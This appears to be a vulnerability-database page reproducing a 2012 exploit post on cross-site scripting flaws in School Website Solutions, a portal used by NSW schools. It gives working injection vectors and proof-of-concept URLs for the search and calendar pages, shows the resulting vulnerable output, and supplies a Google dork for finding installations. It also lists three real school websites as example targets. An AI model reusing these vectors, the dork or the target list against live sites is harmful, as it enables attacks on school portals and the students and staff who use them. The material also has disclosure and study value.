School Website Solutions Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047608 漏洞类型
发布时间 2012-04-24 更新时间 2012-04-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040186
|漏洞详情
漏洞细节尚未披露
|漏洞EXP


===============================================================
= # Exploit Title: SWS - Cross Site Scripting vulnerabilities =
= # Date: 23/04/2012                                          =   
= # Author: Phizo                                             =
= # Manufacturer: www.schoolwebsitesolutions.com              =
= # Version: Latest (Private software, no version number)     =
= # Category: webapps                                         =
= # Google dork: inurl:schools.nsw.edu.au/sws/                =
= # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0)      =
===============================================================


[+] Information: SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software.
Multiple XSS vulnerabilities will be shown to show the insecurity of the portal software.


[+] Details:


========
 Search  -- (Value contained within script tags)
========

# PoC: http://victim/search?search=[XSS]

# Vulnerable code: a.execute("VALUE"); -- VALUE is the value of user input.
# Vector used: '); alert("XSS"); ('
# Output: a.execute("");alert("XSS");("");


==========
 Calendar
==========

# PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS]

# Vulnerable code: (multiple hyperlinks, however I will provide one).
<a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012&print=true" target="_blank" class="printmonth">Print this page</a>

# Vector used: "><script>alert("XSS")</script>
# Output: <a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012"><script>alert("XSS")</script>&print=true" target="_blank" class="printmonth">Print this page</a>


[+] Example sites:

http://www.cook-s.schools.nsw.edu.au/
http://www.lawrenceha-s.schools.nsw.edu.au/
http://www.parameadow-s.schools.nsw.edu.au/